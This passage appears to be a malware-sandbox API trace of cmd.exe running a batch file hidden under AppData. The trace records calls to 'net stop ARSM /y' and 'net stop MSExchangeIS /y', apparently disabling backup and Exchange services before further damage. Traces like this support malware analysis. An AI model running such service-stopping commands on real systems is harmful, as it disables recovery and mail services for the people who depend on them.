out: hHeap=0x3e0000) returned 1 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0213.237] GetProcessHeap () returned 0x3e0000 [0213.237] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0213.237] _get_osfhandle (_FileHandle=3) returned 0x78 [0213.237] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x14c4 [0213.237] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x3fd, lpOverlapped=0x0) returned 1 [0213.237] SetFilePointer (in: hFile=0x78, lDistanceToMove=5334, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x14d6 [0213.238] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=18, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ARSM /y\r\n/y\r\nGAGEMENT /y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 18 [0213.238] _get_osfhandle (_FileHandle=3) returned 0x78 [0213.238] GetFileType (hFile=0x78) returned 0x1 [0213.238] _get_osfhandle (_FileHandle=3) returned 0x78 [0213.238] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x14d6 [0213.238] GetProcessHeap () returned 0x3e0000 [0213.238] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0213.238] GetProcessHeap () returned 0x3e0000 [0213.238] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0213.242] _tell (_FileHandle=3) returned 5334 [0213.242] _close (_FileHandle=3) returned 0 [0213.242] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0213.242] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0213.242] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0213.242] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0213.242] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0213.242] _wcsicmp (_String1="net", _String2="CD") returned 11 [0213.242] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0213.242] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0213.242] _wcsicmp (_String1="net", _String2="REN") returned -4 [0213.242] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0213.242] _wcsicmp (_String1="net", _String2="SET") returned -5 [0213.242] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0213.242] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0213.242] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0213.242] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0213.242] _wcsicmp (_String1="net", _String2="MD") returned 1 [0213.242] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0213.242] _wcsicmp (_String1="net", _String2="RD") returned -4 [0213.242] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0213.242] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0213.242] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0213.242] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0213.242] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0213.243] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0213.243] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0213.243] _wcsicmp (_String1="net", _String2="VER") returned -8 [0213.243] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0213.243] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0213.243] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0213.243] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0213.243] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0213.243] _wcsicmp (_String1="net", _String2="START") returned -5 [0213.243] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0213.243] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0213.243] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0213.243] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0213.243] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0213.243] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0213.243] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0213.243] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0213.243] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0213.243] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0213.243] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0213.243] SetErrorMode (uMode=0x0) returned 0x1 [0213.243] GetProcessHeap () returned 0x3e0000 [0213.244] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0213.244] GetProcessHeap () returned 0x3e0000 [0213.244] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0213.244] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.244] GetProcessHeap () returned 0x3e0000 [0213.244] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0213.244] GetProcessHeap () returned 0x3e0000 [0213.244] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0213.244] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0213.244] GetProcessHeap () returned 0x3e0000 [0213.244] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0213.245] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.245] GetProcessHeap () returned 0x3e0000 [0213.245] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0213.245] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0213.245] GetProcessHeap () returned 0x3e0000 [0213.245] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0213.245] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.246] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.246] GetLastError () returned 0x2 [0213.246] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.246] GetLastError () returned 0x2 [0213.247] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.247] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0213.247] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.248] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.248] GetLastError () returned 0x2 [0213.248] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0213.248] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.249] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.249] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0213.249] SetErrorMode (uMode=0x0) returned 0x1 [0213.249] GetProcessHeap () returned 0x3e0000 [0213.249] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0213.249] GetProcessHeap () returned 0x3e0000 [0213.249] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0213.250] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.250] GetProcessHeap () returned 0x3e0000 [0213.250] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0213.250] GetProcessHeap () returned 0x3e0000 [0213.250] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0213.250] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0213.250] GetProcessHeap () returned 0x3e0000 [0213.250] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0213.250] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.250] GetProcessHeap () returned 0x3e0000 [0213.250] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0213.251] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0213.251] GetProcessHeap () returned 0x3e0000 [0213.251] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0213.251] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.252] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.252] GetLastError () returned 0x2 [0213.252] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.252] GetLastError () returned 0x2 [0213.253] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.253] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0213.253] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.254] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.254] GetLastError () returned 0x2 [0213.254] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0213.254] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.255] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.255] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0213.255] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0213.255] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0213.255] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0213.256] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ARSM /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ARSM /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ARSM /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xa80, dwThreadId=0xa88)) returned 1 [0213.261] CloseHandle (hObject=0x78) returned 1 [0213.261] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0213.261] GetProcessHeap () returned 0x3e0000 [0213.261] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.261] GetEnvironmentStringsW () returned 0x3f8408* [0213.262] GetProcessHeap () returned 0x3e0000 [0213.262] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.262] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.262] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0213.445] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0213.446] CloseHandle (hObject=0x74) returned 1 [0213.446] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0213.446] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0213.446] GetProcessHeap () returned 0x3e0000 [0213.446] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.446] GetEnvironmentStringsW () returned 0x3f8408* [0213.446] GetProcessHeap () returned 0x3e0000 [0213.446] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.447] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.447] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0213.447] GetProcessHeap () returned 0x3e0000 [0213.447] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.447] GetEnvironmentStringsW () returned 0x3f8408* [0213.447] GetProcessHeap () returned 0x3e0000 [0213.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.448] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.448] GetProcessHeap () returned 0x3e0000 [0213.448] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0213.448] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0213.448] _get_osfhandle (_FileHandle=1) returned 0x264 [0213.448] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0213.448] _get_osfhandle (_FileHandle=1) returned 0x264 [0213.448] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0213.448] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0213.448] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0213.448] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0213.448] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0213.449] SetConsoleInputExeNameW () returned 0x1 [0213.449] GetConsoleOutputCP () returned 0x1b5 [0213.449] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0213.449] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0213.449] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0213.449] _get_osfhandle (_FileHandle=3) returned 0x74 [0213.449] SetFilePointer (in: hFile=0x74, lDistanceToMove=5334, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x14d6 [0213.449] GetProcessHeap () returned 0x3e0000 [0213.449] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0213.449] GetProcessHeap () returned 0x3e0000 [0213.449] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0213.449] GetProcessHeap () returned 0x3e0000 [0213.449] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0213.449] GetProcessHeap () returned 0x3e0000 [0213.449] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0213.450] GetProcessHeap () returned 0x3e0000 [0213.450] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0213.450] GetProcessHeap () returned 0x3e0000 [0213.450] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0213.450] GetProcessHeap () returned 0x3e0000 [0213.450] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0213.450] GetProcessHeap () returned 0x3e0000 [0213.450] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0213.450] GetProcessHeap () returned 0x3e0000 [0213.450] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0213.450] GetProcessHeap () returned 0x3e0000 [0213.450] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0213.450] GetProcessHeap () returned 0x3e0000 [0213.450] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0213.450] GetProcessHeap () returned 0x3e0000 [0213.450] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0213.450] GetProcessHeap () returned 0x3e0000 [0213.450] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0213.450] _get_osfhandle (_FileHandle=3) returned 0x74 [0213.450] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x14d6 [0213.450] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x3eb, lpOverlapped=0x0) returned 1 [0213.451] SetFilePointer (in: hFile=0x74, lDistanceToMove=5360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x14f0 [0213.451] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSExchangeIS /y\r\nMENT /y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 26 [0213.451] _get_osfhandle (_FileHandle=3) returned 0x74 [0213.451] GetFileType (hFile=0x74) returned 0x1 [0213.451] _get_osfhandle (_FileHandle=3) returned 0x74 [0213.451] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x14f0 [0213.451] GetProcessHeap () returned 0x3e0000 [0213.451] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0213.451] GetProcessHeap () returned 0x3e0000 [0213.452] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0213.455] _tell (_FileHandle=3) returned 5360 [0213.455] _close (_FileHandle=3) returned 0 [0213.455] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0213.455] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0213.455] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0213.455] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0213.455] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0213.455] _wcsicmp (_String1="net", _String2="CD") returned 11 [0213.455] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0213.455] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0213.455] _wcsicmp (_String1="net", _String2="REN") returned -4 [0213.455] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0213.455] _wcsicmp (_String1="net", _String2="SET") returned -5 [0213.455] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0213.455] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0213.455] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0213.455] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0213.455] _wcsicmp (_String1="net", _String2="MD") returned 1 [0213.455] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0213.456] _wcsicmp (_String1="net", _String2="RD") returned -4 [0213.456] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0213.456] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0213.456] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0213.456] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0213.456] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0213.456] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0213.456] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0213.456] _wcsicmp (_String1="net", _String2="VER") returned -8 [0213.456] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0213.456] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0213.456] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0213.456] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0213.456] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0213.456] _wcsicmp (_String1="net", _String2="START") returned -5 [0213.456] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0213.456] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0213.456] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0213.456] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0213.456] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0213.456] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0213.456] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0213.456] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0213.456] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0213.456] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0213.457] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0213.457] SetErrorMode (uMode=0x0) returned 0x1 [0213.457] GetProcessHeap () returned 0x3e0000 [0213.457] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0213.457] GetProcessHeap () returned 0x3e0000 [0213.457] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0213.457] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.457] GetProcessHeap () returned 0x3e0000 [0213.457] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0213.457] GetProcessHeap () returned 0x3e0000 [0213.457] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0213.458] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, 